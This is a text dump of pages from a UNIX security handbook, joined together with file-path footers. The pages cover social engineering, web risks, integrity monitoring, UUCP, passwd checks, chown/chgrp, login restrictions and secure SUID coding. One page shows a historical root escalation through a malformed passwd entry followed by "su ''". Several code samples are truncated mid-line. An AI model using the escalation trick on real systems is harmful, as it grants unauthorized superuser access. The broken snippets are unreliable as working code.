office, the crime makes the evening news, pictures are in the newspaper, and a regional alert is issued.<br />

No one loses confidence in the bank. But if some hacker steals $5 million as the result of a bug in the<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch27_03.htm (3 of 4) [2002-04-12 10:45:26]


[Chapter 27] 27.3 Can You Trust People?<br />

software and a lack of ethics...<br />

Who do you entrust with your life's savings?<br />

27.3.5 Response Personnel?<br />

Your system has been hacked. You have a little information, but not much. If someone acts quickly,<br />

before logs at remote machines are erased, you might be able to identify the culprit. You get a phone call<br />

from someone claiming to be with the CERT-CC, or maybe the FBI. They tell you they learned from the<br />

administrator at another site that your systems might have been hacked. They tell you what to look for,<br />

then ask what you found on your own. They promise to follow right up on the leads you have and ask<br />

you to remain silent so as not to let on to the hackers that someone is hot on their trail. You never hear<br />

back from them, and later inquiries reveal that no one from the agency involved ever called you.<br />

Does this case sound farfetched? It shouldn't. Administrators at commercial sites, government sites, and<br />

even response teams have all received telephone calls from people who claim to be representatives of<br />

various agencies but who aren't. We've also heard that some of these same people have had their email<br />

intercepted, copied, and read on its way to their machines (usually, a hacked service provider or altered<br />

DNS record is all that is needed). The result? The social engineers working the phones have some<br />

additional background information that makes them sound all the more official.<br />

Who do you trust on the telephone when you get a call? Why?<br />

27.2 Can You Trust Your<br />

Suppliers?<br />

27.4 What All This Means<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch27_03.htm (4 of 4) [2002-04-12 10:45:26]


[Chapter 18] WWW <strong>Sec</strong>urity<br />

Chapter 18<br />

18. WWW <strong>Sec</strong>urity<br />

Contents:<br />

<strong>Sec</strong>urity and the World Wide Web<br />

Running a <strong>Sec</strong>ure Server<br />

Controlling Access to Files on Your Server<br />

Avoiding the Risks of Eavesdropping<br />

Risks of Web Browsers<br />

Dependence on Third Parties<br />

Summary<br />

This chapter explores a number of security issues that arise with use of the World Wide Web. Because of<br />

the complexities of the World Wide Web, some of the issues mentioned in this chapter overlap with<br />

those in other chapters in this book, most notably Chapter 6, Cryptography, Chapter 17, TCP/IP Services,<br />

and Chapter 23, Writing <strong>Sec</strong>ure SUID and Network Programs.<br />

18.1 <strong>Sec</strong>urity and the World Wide Web<br />

The World Wide Web is a system for exchanging information over the <strong>Internet</strong>. The Web is constructed<br />

from specially written programs called Web servers that make information available on the network.<br />

Other programs, called Web browsers, can be used to access the information that is stored in the servers<br />

and to display it on the user's screen.<br />

The World Wide Web was originally developed as a system for physicists to exchange papers pertaining<br />

to their physics research. Using the Web enabled the physicists to short-circuit the costly and often<br />

prolonged task of publishing research findings in paper scientific journals. Short-circuiting publishers<br />

remains one of the biggest uses of the Web today, with businesses, universities, government agencies,<br />

and even individuals publishing millions of screens of information about themselves and practically<br />

everything else. Many organizations also use the Web for distributing confidential documents within<br />

their organization, and between their organization and its customers.<br />

Another exciting use of the Web today involves putting programs behind Web pages. Programs are<br />

created with a protocol called the Common Gateway Interface (CGI). CGI scripts can be quite simple -<br />

for example, a counter that increments every time a person looks at the page, or a guest book that allows<br />

people to "sign in" to a site. Or they might be quite sophisticated. For example, the FedEx<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch18_01.htm (1 of 3) [2002-04-12 10:45:26]


[Chapter 18] WWW <strong>Sec</strong>urity<br />

package-delivery service allows its customers to use the company's World Wide Web server<br />

(http://www.fedex.com) to trace packages. Giving customers access to its computers in this manner<br />

simultaneously saves FedEx money and gives the customers better service.<br />

Many other companies are now exploring the use of the WWW for electronic commerce. Customers<br />

browse catalogs of goods and services, select items, and then pay for them without anything other than a<br />

forms-capable browser.<br />

The World Wide Web is one of the most exciting uses of the <strong>Internet</strong>. But it also poses profound security<br />

challenges. In order of importance, these challenges are:<br />

1.<br />

2.<br />

3.<br />

4.<br />

5.<br />

An attacker may take advantage of bugs in your Web server or in CGI scripts to gain unauthorized<br />

access to other files on your system, or even to seize control of the entire computer.<br />

Confidential information that is on your Web server may be distributed to unauthorized<br />

individuals.<br />

Confidential information transmitted between the Web server and the browser can be intercepted.<br />

Bugs in your Web browser (or features you are not aware of) may allow confidential info on your<br />

Web client to be obtained from a rogue Web server.<br />

Because of the existence of standards and patented technologies, many organizations have found it<br />

necessary to purchase specially licensed software. This licensed software, in turn, can create its<br />

own unique vulnerabilities.<br />

Each of these challenges requires its own response. Unfortunately, some of the solutions that are<br />

currently being employed are contradictory. For example, to minimize the risk of eavesdropping, many<br />

organizations have purchased "secure" World Wide Web servers, which implement a variety of<br />

encryption protocols. But these servers require a digitally signed certificate to operate, and that certificate<br />

must be renewed on an annual basis. Consequently, organizations that are dependent on their WWW<br />

servers are exposed to interesting denial of service attacks.<br />

NOTE: There are many Web servers currently in use, and there will be even more in use<br />

within the months after this book is published. While we were working on this book, several<br />

groups distributing Web servers announced or released several new versions of their<br />

programs.<br />

It would be very difficult, and not very useful, for this chapter to discuss the specific details<br />

of specific Web servers. Besides the fact that there are too many of them, they are changing<br />

too fast, so any details included in this book would be out of date within a year of<br />

publication. The <strong>Internet</strong> is evolving too quickly for printed documentation to remain<br />

current.<br />

For this reason, this chapter discusses Web security in fairly general terms. Specific<br />

examples, where appropriate, use the NCSA Web server (with brief mention of the CERN<br />

and WN servers), with the understanding that other Web servers may have similar or<br />

different syntax.<br />

<strong>Sec</strong>urity Information on the WWW<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch18_01.htm (2 of 3) [2002-04-12 10:45:26]


[Chapter 18] WWW <strong>Sec</strong>urity<br />

There are a few excellent resources on the World Wide Web pertaining to WWW security issues. If you<br />

are developing CGI programs or running a Web server, you should be sure to look them over, to see what<br />

has happened in the area of Web security since this book was published.<br />

The references are currently located at:<br />

http://www-genome.wi.mit.edu/WWW/faqs/www-security-faq.html<br />

Lincoln D. Stein's WWW <strong>Sec</strong>urity FAQ.<br />

http://www.primus.com/staff/paulp/cgi-security<br />

Paul Phillips CGI security FAQ.<br />

http://hoohoo.ncsa.uiuc.edu/cgi/security.html<br />

NCSA's CGI security documentation.<br />

http://www.cs.purdue.edu/coast/hotlist.html#securi01<br />

The WWW section of the COAST Lab's hotlist.<br />

17.7 Summary 18.2 Running a <strong>Sec</strong>ure Server<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch18_01.htm (3 of 3) [2002-04-12 10:45:26]


[Chapter 9] 9.3 A Final Note<br />

9.3 A Final Note<br />

Chapter 9<br />

Integrity Management<br />

Change detection, through integrity monitoring, is very useful for a system administrator. Not only can it<br />

discover malicious changes and act as a form of intrusion detection, but it can also detect:<br />

●<br />

●<br />

●<br />

●<br />

Cases of policy violation by staff, where programs are installed or changed without following the<br />

proper notification procedure<br />

Possible hardware failure leading to data corruption<br />

Possible bugs in software leading to data corruption<br />

Computer viruses, worms, or other malware<br />

However, there are two key considerations for your mechanism to work, whether you are using rdist,<br />

comparison copies, checklists, or Tripwire:<br />

1.<br />

2.<br />

The copies of software you use as your base, for comparison or database generation, must be<br />

beyond reproach. If you start with files that have already been corrupted, your mechanism may<br />

report no change from this corrupted state. Thus, you should usually initialize your software base<br />

from distribution media to provide a known, good copy to initialize your comparison procedure.<br />

The software and databases you use with them must be protected under all circumstances. If an<br />

intruder is able to penetrate your defenses and gain root access between scans, he or she can alter<br />

your programs and edit your comparison copies and databases to quietly accept whatever other<br />

changes are made to the system. For this reason, you want to keep the software and data on<br />

physically protected media, such as write-protected disks or removable disks. By interposing a<br />

physical protection between this data and any malicious hacker, you prevent it from being altered<br />

even in the event of a total compromise.<br />

9.2 Detecting Change 10. Auditing and Logging<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch09_03.htm [2002-04-12 10:45:27]


[Chapter 15] 15.2 Versions of UUCP<br />

Chapter 15<br />

UUCP<br />

15.2 Versions of UUCP<br />

There are three main versions of UUCP:<br />

●<br />

●<br />

●<br />

Version 2<br />

HoneyDanBer UUCP (HDB/BNU)<br />

Taylor UUCP<br />

Version 2 UUCP was written in 1977 by Mike Lesk, David Nowitz, and Greg Chesson at AT&T Bell<br />

Laboratories. (Version 2 was a rewrite of the first UUCP version, which was written by Lesk the<br />

previous year and was never released outside AT&T.) Version 2 was distributed with <strong>UNIX</strong> Version 7 in<br />

1977, and is at the heart of many vendors' older versions of UUCP. The Berkeley versions of UUCP are<br />

derived largely from Version 2, and include many enhancements.<br />

Version 2 UUCP is seldom seen anymore. It has largely been replaced by HDB UUCP at sites still using<br />

UUCP. We describe it in this chapter for historical reasons and to be complete. However, we encourage<br />

you to think about upgrading to the HDB form, if possible.<br />

In 1983, AT&T researchers Peter Honeyman, David A. Nowitz, and Brian E. Redman developed a new<br />

version of UUCP that became known as HoneyDanBer UUCP. AT&T began distributing this version<br />

with <strong>UNIX</strong> System V Release 3 under the name " Basic Networking Utilities," or BNU. The BNU<br />

version is probably the most commonly used version of UUCP today.<br />

From the system administrator's point of view, the primary difference between these two versions of<br />

UUCP is their configuration files. Version 2 uses one set of configuration files, while BNU has another.<br />

Look in the /usr/lib/uucp directory (on some systems, the directory is renamed /etc/uucp). If you have a<br />

file called USERFILE, you are using Version 2 configuration files, and probably have Version 2 UUCP.<br />

If you have a file called Permissions, you are using BNU configuration files, and probably have BNU.<br />

Another significant difference between the two versions is the support for security options and enhanced<br />

logging. BNU is much improved over Version 2 in both regards. We describe the configuration<br />

differences later, and present the logging for BNU in "UUCP Log Files" in Chapter 10.<br />

Taylor UUCP is a version of UUCP written by Ian Lance Taylor. It is a free version of UUCP which is<br />

covered under the GNU Public License. It supports either style of configuration files, and will even allow<br />

you to use both at the same time. Taylor UUCP is frequently distributed with the Linux operating system.<br />

Most Linux distributions use the BNU-style configuration files.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_02.htm (1 of 2) [2002-04-12 10:45:27]


[Chapter 15] 15.2 Versions of UUCP<br />

In addition to Taylor UUCP, several free or inexpensive implementations of UUCP are available for<br />

<strong>UNIX</strong>, DOS, MacOS, AmigaOS, and other systems - even VMS! Because these implementations are not<br />

widely used, documentation on them is limited and their security aspects are unknown (at least to us).<br />

Whatever version you are using, we expect that many of our comments in the remainder of this chapter<br />

apply to it.<br />

15.1 About UUCP 15.3 UUCP and <strong>Sec</strong>urity<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_02.htm (2 of 2) [2002-04-12 10:45:27]


[Chapter 8] 8.2 Monitoring File Format<br />

Chapter 8<br />

Defending Your Accounts<br />

8.2 Monitoring File Format<br />

Most programs that access the /etc/passwd and /etc/group files are very sensitive to problems in the<br />

formatting of those files, or to bad values. Because of the compact representation of the file, entries that are<br />

badly formatted could be hidden.<br />

Traditionally, a number of break-ins to <strong>UNIX</strong> systems occurred when a program that was designed to write to<br />

the /etc/passwd file was given bad input. For instance, early versions of the chfn and yppasswd commands<br />

could be given input with ":" characters or too many characters. The result was a badly formatted record to<br />

write to the /etc/passwd file. Because of the way the records were written, the associated library routines that<br />

wrote to the file would truncate or pad the entries, and might produce an entry at the end that looked like:<br />

::0:0:::<br />

This type of entry would then allow a local user to become a superuser by typing:<br />

$ su ''<br />

#<br />

(The above example changes the user to the null-named account.) Clearly, this result is undesirable.<br />

You should check the format of both the passwd and group files on a regular basis. With many versions of<br />

<strong>UNIX</strong> with System V ancestry, there are two commands on the system that will check the files for number of<br />

fields, valid fields, and other consistency factors. These two programs are pwck and grpck; they are usually<br />

found in /etc or /usr/sbin.<br />

Also on SVR4 systems is the logins command. When issued with the -p option, it will check for any accounts<br />

without a password. When issued with the -d option, it will check for duplicate IDs - including accounts that<br />

have an ID of 0 in addition to the root account.<br />

If you do not have access to these commands, you can write your own to do some of these same checks. For<br />

instance:<br />

# awk -F: 'NF != 7 || $2 == 0 { print "Problem with" $0}' /etc/passwd<br />

8.1 Dangerous Accounts 8.3 Restricting Logins<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_02.htm [2002-04-12 10:45:27]


[Chapter 5] 5.8 chgrp: Changing a File's Group<br />

Chapter 5<br />

The <strong>UNIX</strong> Filesystem<br />

5.8 chgrp: Changing a File's Group<br />

The chgrp command lets you change the group of a file. The behavior here mirrors that of chown. Under<br />

most modern versions of <strong>UNIX</strong>, you can change the group of a file if you are either one of the following<br />

users:<br />

●<br />

●<br />

You are the file's owner and you are in the group to which you are trying to change the file.<br />

You are the superuser.<br />

On older AT&T versions of <strong>UNIX</strong>, you may set any file you own to any group that you want. That is,<br />

you can "give away" files to other groups, the same as you can give away files to other users. Beware.<br />

The chgrp command has the form:<br />

chgrp [ -fRh ] group filelist<br />

The -f and -R options are interpreted the same as they are for the chmod and chown commands. The -h<br />

option is a bit different from that of chmod. Under chgrp, the option specifies that the group of the link<br />

itself is changed and not what the link points to.<br />

Other entries have the following meanings:<br />

group<br />

The group to which you are changing the file(s). The group may be specified by name or with its<br />

decimal GID.<br />

filelist<br />

The list of files whose group you are changing.<br />

For example, to change the group of the file paper.tex to chem, you would type:<br />

% chgrp chem paper.tex<br />

% ls -l paper.tex<br />

-rw-r--r-- 1 kevin chem 59321 Jul 12 13:54 paper.tex<br />

%<br />

5.7 chown: Changing a File's<br />

Owner<br />

5.9 Oddities and Dubious<br />

Ideas<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_08.htm (1 of 2) [2002-04-12 10:45:27]


[Chapter 5] 5.8 chgrp: Changing a File's Group<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_08.htm (2 of 2) [2002-04-12 10:45:27]


[Appendix C] C.2 Creating Processes<br />

Appendix C<br />

<strong>UNIX</strong> Processes<br />

C.2 Creating Processes<br />

A <strong>UNIX</strong> process can create a new process with the fork() system function.[6] fork() makes an identical<br />

copy of the calling process, with the exception that one process is identified as the parent or parent<br />

process, while the other is identified as the child or child process.<br />

[6] fork is really a family of system calls. There are several variants of the fork call,<br />

depending on the version of <strong>UNIX</strong> that is being used, including the vfork() call, special calls<br />

to create a traced process, and calls to create a special kind of process known as a thread.<br />

Note the following differences between child and parent:<br />

●<br />

●<br />

●<br />

●<br />

They have different PIDS.<br />

They have different PPIDS (parent PIDS).<br />

Accounting information is reset for the child.<br />

They each have their own copy of the file descriptions.<br />

The exec family of system functions lets a process change the program that it's running. Processes<br />

terminate when they call the _exit system function or when they generate an exception, such as an<br />

attempt to use an illegal instruction or address an invalid region of memory.<br />

<strong>UNIX</strong> uses special programs, called shells (/bin/ksh, /bin/sh, and /bin/csh are all common shells) to read<br />

commands from the user and run other programs. The shell runs other programs by first executing one of<br />

the fork family of instructions to create a near-duplicate second process; the second process then uses one<br />

of the exec family of calls to run a new program, while the first process waits until the second process<br />

finishes. This technique is used to run virtually every program in <strong>UNIX</strong>, from small programs like /bin/ls<br />

to large programs like word processors.<br />

If all of the processes on the system suddenly die (or exit), the computer would be unusable, because<br />

there would be no way of starting a new process. In practice this scenario never occurs, for reasons that<br />

will be described later.<br />

C.1 About Processes C.3 Signals<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appc_02.htm (1 of 2) [2002-04-12 10:45:28]


[Appendix C] C.2 Creating Processes<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appc_02.htm (2 of 2) [2002-04-12 10:45:28]


[Chapter 8] 8.3 Restricting Logins<br />

8.3 Restricting Logins<br />

Chapter 8<br />

Defending Your Accounts<br />

Some systems have (or will soon have) the ability to restrict the circumstances under which each user<br />

may log in. In particular, you could specify times of day and days of the week for each account during<br />

which a user may not log in. You could also restrict the login account to a particular terminal line.<br />

These restrictions are very useful additional features to have, if they are available. They help prohibit<br />

access to accounts that are only used in a limited environment, thus narrowing the "window of<br />

opportunity" an attacker might have to exploit the system.<br />

For example, if your system is used in a business setting, perhaps the VP of finance will never log in<br />

from any network terminal, and he is never at work outside the hours of 7 a.m. to 7 p.m. on weekdays.<br />

Thus, you could configure his account to prohibit any logins outside those terminals and those hours. If<br />

an attacker knew the account existed and was involved in password cracking or other intelligence<br />

gathering over an off-site network connection, she would not be able to get in even if she stumbled<br />

across the correct password.<br />

If your system does not support this feature yet, you can ask your vendor when it will be provided. If you<br />

want to put in your own version, you can do so with a simple shell script:<br />

1.<br />

First, write a script something like the following and put it in a secure location, such as<br />

/etc/security/restrictions/fred:<br />

#!/bin/ksh<br />

allowed_ttys="/dev/tty@(01|02|03)"<br />

allowed_days="@(Mon|Tue|Wed|Thu|Fri)"<br />

allowed_hours="(( hour >= 7 && hour


[Chapter 8] 8.3 Restricting Logins<br />

2.<br />

3.<br />

exec -a -${real_shell##*/} $real_shell "${1+"$@"}<br />

Replace the user's login shell with this script in the /etc/passwd file. Do so with the usermod -s<br />

command, the vipw command, or equivalent:<br />

# usermod -s /etc/security/restrictions/fred fred<br />

Remove the user's ability to change his or her own shell. If everyone on the system is going to<br />

have constraints on login place and time, then you can simply:<br />

# chmod 0 /bin/chsh<br />

This method is preferable to deleting the command entirely because you might need it again<br />

later.[3]<br />

[3] Be very careful when running this command as it will only work if /bin/chsh is a<br />

single-purpose program that only changes the user's shell. If passwd is a link to chsh<br />

(or other password utilities), the chmod can break a lot of things. Under SunOS, 4.1.x,<br />

/bin/passwd is a hard link to /bin/chfn, so if you do this chmod, people won't be able<br />

to change passwords either! (This may be the case for other operating systems as<br />

well.) Note as well that removing chsh won't work either in this case because users<br />

can ln -s /bin/passwd chfn and run it that way. Finally, some passwd programs have<br />

the chfn functionality as a command line option! On these systems, you can only<br />

prevent a user from changing his shell by removing the unapproved shells from the<br />

/etc/shells file.<br />

If only a few people are going to have restricted access, create a new group named restricta (or<br />

similar), and add all the users to that group. Then, do:<br />

# chmod 505 /bin/chsh # chgrp restricta /bin/chsh<br />

This will allow other users to change their shells, but not anyone in the restricta group.<br />

NOTE: If you take this approach, either with a vendor-supplied method or something like<br />

the example above, keep in mind that there are circumstances where some users may need<br />

access at different times. In particular, users traveling to different time zones, or working on<br />

big year-end projects, may need other forms of access. It is important that someone with the<br />

appropriate privileges is on call to alter these restrictions, if needed. Remember that the goal<br />

of security is to protect users, and not get in the way of their work!<br />

8.2 Monitoring File Format 8.4 Managing Dormant<br />

Accounts<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_03.htm (2 of 2) [2002-04-12 10:45:28]


[Chapter 5] 5.7 chown: Changing a File's Owner<br />

Chapter 5<br />

The <strong>UNIX</strong> Filesystem<br />

5.7 chown: Changing a File's Owner<br />

The chown command lets you change the owner of a file. Only the superuser can change the owner of a<br />

file under most modern versions of <strong>UNIX</strong>.<br />

The chown command has the form:<br />

chown [ -fRh ] owner filelist<br />

The -f and -R options are interpreted exactly as they are for the chmod and chgrp commands, if<br />

supported. The -h option is a bit different from that of chmod. Under chown, the option specifies that the<br />

owner of the link itself is changed and not what the link points to.<br />

Other entries have the following meanings:<br />

owner<br />

The file's new owner; specify the owner by name or by decimal UID.<br />

filelist<br />

The list of files whose owner you are changing.<br />

In earlier versions of <strong>UNIX</strong>, all users could run the chown command to change the ownership of a file<br />

that they owned to that of any other user on the system. This let them "give away" a file. The feature<br />

made sharing files back and forth possible, and allowed a user to turn over project directories to someone<br />

else.<br />

Allowing users to give away files can be a security problem because it makes a miscreant's job of hiding<br />

his tracks much easier. If someone has acquired stolen information or is running programs that are trying<br />

to break computer security, that person can simply change the ownership of the files to that of another<br />

user. If he sets the permissions correctly, he can still read the results. Permitting file give-aways also<br />

makes file quotas useless: a user who runs out of quota simply changes the ownership of his larger files<br />

to another user. Worse, perhaps, he can create a huge file and change its ownership to someone else,<br />

exceeding the user's quota instantly. If the file is in a directory to which the victim does not have access,<br />

he or she is stuck.<br />

The BSD development group saw these problems and changed the behavior of chown so that only the<br />

superuser could change ownership of files. This change has led to an interesting situation. When the<br />

POSIX group working on a standard was faced with the hard choice of which behavior to pick as<br />

standard, they bravely took a stand and said "both." Thus, depending on the setting of a system<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_07.htm (1 of 2) [2002-04-12 10:45:28]


[Chapter 5] 5.7 chown: Changing a File's Owner<br />

configuration parameter, your system can use either the old AT&T behavior, or the BSD-derived<br />

behavior. We strongly urge you to choose the BSD-derived behavior. Not only does it allow you to use<br />

file quotas and keep mischievous users from framing other users, but many software packages you might<br />

download from the net or buy from vendors will not work properly if run under the old AT&T-style<br />

environment.<br />

NOTE: If your system came to you with the old chown behavior, then ensure that the<br />

software was written with that in mind. Be extra careful as you read some of our advice in<br />

this book, because a few things we might recommend won't work for you on such a system.<br />

Also, be especially cautious about software you might download from the net or buy from a<br />

vendor. Most of this software has been developed under BSD-derived systems that limit use<br />

of chown to the superuser. Thus, the software might have vulnerabilities when run under<br />

your environment.<br />

Do not mix the two types of systems when you are using some form of network filesystem<br />

or removable, user-mountable media. The result can be a compromise of your system. Files<br />

created using one paradigm may possibly be exploited using another.<br />

Under some versions of <strong>UNIX</strong> (particularly those that let nonsuperusers chown files),<br />

chown will clear the SUID, SGID, and sticky bits. This is a security measure, so that SUID<br />

programs are not accidentally created. If your version of <strong>UNIX</strong> does not clear these bits<br />

when using chown, check with an ls -l after you have done a chown to make sure that you<br />

have not suddenly created a SUID program that will allow your system's security to be<br />

compromised. (Actually, this process is a good habit to get into even if your system does do<br />

the right thing.) Other versions of <strong>UNIX</strong> will clear the execute, SUID, and SGID bits when<br />

the file is written or modified. You should determine how your system behaves under these<br />

circumstances and be alert to combinations of actions that might accidentally create a SUID<br />

or SGID file. POSIX specifies that when chown is executed on a symbolic link, the<br />

ownership of the target of the link is changed instead of the ownership of the link itself.<br />

POSIX further specifies that the -R option does not follow symbolic links if they point to<br />

directories (but nevertheless changes the ownership of these directories). On most modern<br />

systems of <strong>UNIX</strong>, there is a -h option to chown (and chgrp and chmod) that instructs the<br />

command to not follow the link and to instead change the permissions on the link itself - or<br />

to ignore the symbolic link and change nothing. You should understand how this behaves on<br />

your system and use it if appropriate.<br />

5.6 Device Files 5.8 chgrp: Changing a File's<br />

Group<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_07.htm (2 of 2) [2002-04-12 10:45:28]


[Chapter 23] 23.4 Tips on Writing SUID/SGID Programs<br />

Chapter 23<br />

Writing <strong>Sec</strong>ure SUID and<br />

Network Programs<br />

23.4 Tips on Writing SUID/SGID Programs<br />

If you are writing programs that are SUID or SGID, you must take added precautions in your programming. An overwhelming number of<br />

<strong>UNIX</strong> security problems have been caused by SUID/SGID programs. These rules should be considered in addition to the previous list.<br />

Here are some rules for writing (and not writing) SUID/SGID programs:<br />

1.<br />

2.<br />

3.<br />

4.<br />

5.<br />

6.<br />

7.<br />

8.<br />

9.<br />

10.<br />

"Don't do it. Most of the time, it's not necessary."[11]<br />

[11] Thanks to Patrick H. Wood and Stephen G. Kochan, <strong>UNIX</strong> System <strong>Sec</strong>urity, Hayden Books, 1985, for this<br />

insightful remark.<br />

Avoid writing SUID shell scripts.<br />

If you are using SUID to access a special set of files, don't.<br />

Instead, create a special group for your files and make the program SGID to that group. If you must use SUID, create a special<br />

user for the purpose.<br />

If your program needs to perform some functions as superuser, but generally does not require SUID permissions, consider putting<br />

the SUID part in a different program, and constructing a carefully controlled and monitored interface between the two.<br />

If you need SUID or SGID permissions, use them for their intended purpose as early in the program as possible, and then revoke<br />

them by returning the effective, and real, UIDS and GIDS to those of the process that invoked the program.<br />

If you have a program that absolutely must run as SUID, try to avoid equipping the program with a general-purpose interface that<br />

allows users to specify much in the way of commands or options.<br />

Erase the execution environment, if at all possible, and start fresh.<br />

Many security problems have been caused because there was a significant difference between the environment in which the<br />

program was run by an attacker and the environment under which the program was developed. (See item 5 under <strong>Sec</strong>tion 23.2,<br />

"Tips on Avoiding <strong>Sec</strong>urity-related Bugs" earlier in this chapter for more information about this suggestion.)<br />

If your program must spawn processes, use only the execve( ), execv( ), or execl( ) calls, and use them with great care.<br />

Avoid the execlp( ) and execvp( ) calls because they use the PATH environment variable to find an executable, and you might not<br />

run what you think you are running.<br />

If you must provide a shell escape, be sure to setgid(getgid( )) and setuid(getuid( )) before executing the user's command.<br />

In general, use the setuid() and setgid() functions to bracket the sections of your code which require superuser privileges. For<br />

example:<br />

setuid(0); /* Become superuser to open the master file<br />

*/<br />

fd = open("/etc/masterfile",O_RDONLY);<br />

setuid(-1); /* Give up superuser for now */<br />

if(fd


[Chapter 23] 23.4 Tips on Writing SUID/SGID Programs<br />

2.<br />

3.<br />

4.<br />

putenv("PATH=/bin:/usr/bin:/usr/ucb");<br />

putenv("IFS= \t\n");<br />

Then, examine the environment to be certain that there is only one instance of the variable: the one you set. An attacker can run<br />

your code from another program that creates multiple instances of an environment variable. Without an explicit check, you may<br />

find the first instance, but not the others; such a situation could result in problems later on. In particular, step through the elements<br />

of the environment yourself rather than depending on the library getenv() function.<br />

Use the full pathname for all files that you open.<br />

Do not make any assumptions about the current directory. (You can enforce this requirement by doing a chdir(/tmp/root/)as one of<br />

the first steps in your program, but be sure to check the return code!)<br />

Consider statically linking your program, if possible.<br />

If a user can substitute a different module in a dynamic library, even carefully coded programs are vulnerable. (We have some<br />

serious misgivings about the trend in commercial systems towards completely shared, dynamic libraries. See our comments in the<br />

section Chapter 11, Protecting Against Programmed Threats.)<br />

Consider using perl -T or taintperl for your SUID programs and scripts.<br />

Perl's tainting features make it more suited to SUID programming than C. For example, taintperl will insist that you set the PATH<br />

environment variable to a known "safe value" before calling system(). The program will also require that you "untaint" any<br />

variable that is input from the user before using it (or any variable dependent on that variable) as an argument for opening a file.<br />

However, note that you can still get yourself in a great deal of trouble with taintperl if you circumvent its checks or you are<br />

careless in writing code. Also note that using taintperl introduces dependence on another large body of code working correctly:<br />

we'd suggest you skip using taintperl if you believe you can code at least as well as Larry Wall.[12]<br />

[12] Hint: if you think you can, you are probably wrong.<br />

23.4.1 Using chroot()<br />

If you are writing a SUID root program, you can enhance its security by using the chroot() system call. The chroot() call changes the<br />

root directory of a process to a specified subdirectory within your filesystem. This change essentially gives the calling process a private<br />

world from which it cannot escape.<br />

For example, if you have a program which only needs to listen to the network and write into a log file that is stored in the directory<br />

/usr/local/logs, then you could execute the following system call to restrict the program to that directory:<br />

chroot("/usr/local/logs");<br />

There are several issues that you must be aware of when using the chroot() system call that are not immediately obvious:<br />

1.<br />

2.<br />

3.<br />

If your operating system supports shared libraries and you are able to statically link your program, you should be sure that your<br />

program is statically linked. On some systems, static linking is not possible. On these systems, you should make certain that the<br />

necessary shared libraries are available within the restricted directory (as copies).<br />

You should not give users write access to the chroot()'ed directory.<br />

If you intend to log with syslog(), you should call the openlog() function before executing the chroot() system call, or make sure<br />

that a /dev/log device file exists within the chroot() directory.<br />

Note that under some versions of <strong>UNIX</strong>, a user with a root shell and the ability to copy compiled code into the chroot'd environment<br />

may be able to "break out." Thus, don't put all your faith in this mechanism.<br />

23.3 Tips on Writing Network<br />

Programs<br />

23.5 Tips on Using Passwords<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_04.htm (2 of 2) [2002-04-12 10:45:28]


[Chapter 26] 26.3 Civil Actions<br />

26.3 Civil Actions<br />

Chapter 26<br />

Computer <strong>Sec</strong>urity and U.S. Law<br />

Besides criminal law, the courts also offer remedies through civil actions (lawsuits). The nature of<br />

lawsuits is such that you can basically sue anyone for any reasonable claim of damages or injury. You<br />

can even sue parties unknown, as long as some hope exists of identifying them at a later time. You can<br />

ask for actual and punitive payment of damages, injunctive relief (cease-and-desist orders), as well as<br />

other remedies for damage. Often, a case is easier to prove in a civil court than in a criminal court. Civil<br />

cases require a less strict standard of proof to convict than do criminal cases (a "preponderance of the<br />

evidence" as opposed to the "beyond a reasonable doubt" standard used in criminal cases).<br />

Civil remedies are much easier to get after a criminal conviction is obtained.<br />

However, filing civil suits for damages in the case of break-ins or unauthorized activity may not be a<br />

practical course of action for several reasons:<br />

1.<br />

2.<br />

3.<br />

Civil suits can be very expensive to pursue. Criminal cases are prosecuted by a government unit,<br />

